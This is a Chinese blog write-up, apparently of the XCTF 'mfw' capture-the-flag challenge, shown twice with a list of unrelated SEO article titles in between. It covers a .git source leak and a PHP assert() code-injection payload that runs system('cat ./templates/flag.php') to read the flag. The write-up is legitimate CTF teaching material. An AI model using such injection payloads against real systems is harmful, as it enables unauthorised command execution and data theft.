攻防世界mfw的详细攻略有哪些?

2026-05-22 06:161阅读0评论SEO问题
  • 内容介绍
  • 文章标签
  • 相关推荐

本文共计340个文字,预计阅读时间需要2分钟。

攻防世界mfw的详细攻略有哪些?

使用mfw进入环境,搜集到两个信息。可能存在git泄露,flag可能在flag中。测试后发现确实存在git泄露,我们使用githack工具进一步。简单看了下代码,在templates目录下发现了flag.php,在index.php中发现了关键代码。

mfw

进入到环境搜集到两个信息

可能存在git泄露,flag就在flag中

测试了以下确实存在git泄露那我们使用githack还原

简单看了一下代码在templates目录下发现了flag.php,在index.php中发现关键代码

<?php if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = "home"; } $file = "templates/" . $page . ".php"; // I heard '..' is dangerous! assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); // TODO: Make this look nice assert("file_exists('$file')") or die("That file doesn't exist!"); ?>

这里发现一个assert()函数,想到估计是代码执行漏洞,而$page没有任何的控制直接拼接,我们想利用assert()函数执行cat ./templates/flag.php获得flag,那么肯定要破坏原来的assert结构才能,使得我们目标才能达成

assert("strpos('$file', '..') === false") assert("file_exists('$file')")

那么我们构造如下payload

?page=') or system('cat ./templates/flag.php');//

传入后就变成

$file="templates/') or system('cat ./templates/flag.php');//.php"

替换

assert("strpos('template/') or system('cat ./template/flag.php');//.php, '..') === false")

真正运行

strpos('template/') or system('cat ./template/flag.php'); #由于strpos函数报错,因此运行我们构造的语句or后面的语句

查看源码发现flag

攻防世界mfw的详细攻略有哪些?

标签:攻防世界mfw进入

相关推荐

195975哪家SEO搜索引擎优化服务在行业内口碑最好?195985Linux中grep命令如何高效搜索文件内容?195986如何通过金湾SEO,运用关键词策略精炼术打造长尾关键词?195991BlockingQueue源码中如何实现线程安全?195993NABCD电梯演讲如何提升个人影响力?196003哪家百度SEO排名公司口碑好,值得长期信赖?196011专业网站建设市场分析,未来趋势、机遇与挑战有哪些?196013如何通过注入创新活力改写网站内容,焕发其效应?196016如何通过使用分散锚文本来优化SEO权重?196017如何通过场景化优化SEM策略,实现转化率提升的秘籍?196023如何才能自然呈现高质量、多维度内容?196033如何记录我的Docker学习历程?196048如何高效获取高质量外链的实用技巧?196057如何运用15招策略,有效提升新网站SEO排名?196059LDD3第三章有哪些重点内容,如何高效学习?196060有哪些优质的Linux教学视频和实用经验可以分享?

本文共计340个文字,预计阅读时间需要2分钟。

攻防世界mfw的详细攻略有哪些?

使用mfw进入环境,搜集到两个信息。可能存在git泄露,flag可能在flag中。测试后发现确实存在git泄露,我们使用githack工具进一步。简单看了下代码,在templates目录下发现了flag.php,在index.php中发现了关键代码。

mfw

进入到环境搜集到两个信息

可能存在git泄露,flag就在flag中

测试了以下确实存在git泄露那我们使用githack还原

简单看了一下代码在templates目录下发现了flag.php,在index.php中发现关键代码

<?php if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = "home"; } $file = "templates/" . $page . ".php"; // I heard '..' is dangerous! assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); // TODO: Make this look nice assert("file_exists('$file')") or die("That file doesn't exist!"); ?>

这里发现一个assert()函数,想到估计是代码执行漏洞,而$page没有任何的控制直接拼接,我们想利用assert()函数执行cat ./templates/flag.php获得flag,那么肯定要破坏原来的assert结构才能,使得我们目标才能达成

assert("strpos('$file', '..') === false") assert("file_exists('$file')")

那么我们构造如下payload

?page=') or system('cat ./templates/flag.php');//

传入后就变成

$file="templates/') or system('cat ./templates/flag.php');//.php"

替换

assert("strpos('template/') or system('cat ./template/flag.php');//.php, '..') === false")

真正运行

strpos('template/') or system('cat ./template/flag.php'); #由于strpos函数报错,因此运行我们构造的语句or后面的语句

查看源码发现flag

攻防世界mfw的详细攻略有哪些?